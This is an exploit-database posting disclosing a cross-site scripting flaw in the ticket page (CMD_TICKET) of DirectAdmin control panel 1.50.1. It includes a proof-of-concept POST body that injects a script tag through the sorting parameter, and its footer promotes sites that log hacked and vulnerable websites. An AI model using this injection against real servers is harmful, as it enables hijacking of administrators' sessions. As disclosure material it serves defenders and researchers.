Directadmin ControlPanel 1.50.1 (Message System) Xss Vulnerability

2017-01-17 20:48:05
Posted by: irist.ir

#################################

#
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@
#

#####################################

#####################################

# Iranian Exploit DataBase

# Directadmin ControlPanel 1.50.1 (Message System) Xss Vulnerability

# Directadmin Version : 1.50.1 And Old Version - Message System Page

# Testet On : Centos 6 - Directadmin 1.50.1

# Vendor site : http://www.directadmin.com

# Pic : http://iedb.ir/img/bug-directadmin-2-iedb.ir.jpg

# Author : Amir ( [email protected] - https://telegram.me/AmirAm67)

# Site : IeDb.Ir - irist.ir - xssed.Ir

# Iedb Telegram : https://telegram.me/iedbteam

# Archive Exploit = http://iedb.ir/exploits-6582.html

#####################################

Description :

A client side cross site scripting vulnerability is detected on DirectAdmins Management Web-Application.
The exploit, to allow the user to execute a script.
The bug, on page Message System to view Ticket.

Bug :

http://ip:2222/CMD_TICKET

Select Ticket And Delete.Xss In Post Method For This Page.

http://ip:2222/CMD_TICKET

POST :

select2=0000000100&delete=Delete+Selected&action=multiple&sorting=sort1=-1'"><script>alert(/IrIsT.Ir/)</script>

Pic For This Bug : http://iedb.ir/img/bug-directadmin-2-iedb.ir.jpg

#####################################

** http://iedb.ir ==>> Iranian Exploit DataBase And Iranian Security Team

** http://irist.ir ==>> Register hacked sites

** http://xssed.Ir ==>> Sign vulnerable sites ( xss and sql ) (Vulnerability attack information site)

Thanks to : C0dex,B3hz4d,Beni_vanda,Mr_time,Bl4ck M4n,black_security,Yasser,Ramin Assadian,Black_Nofuzi,SecureHost,1TED,Mr_Kelever,Mr_keeper,Mahmod,Iedb,

Khashayar,B3hz4d4,Shabgard,Cl09er,Be_lucky,Moslem Haghighian,Dr_Iman,8Bit,Javid,Esmiley_Amir,Mahdi_feizezade,Amin_Zohrabi,Shellshock3 And all my friends And All Member In Iedb.Ir Team

#####################################

# Archive Exploit = http://iedb.ir/exploits-6582.html

#####################################

Fixes

No fixes

In order to submit a new fix you need to be registered.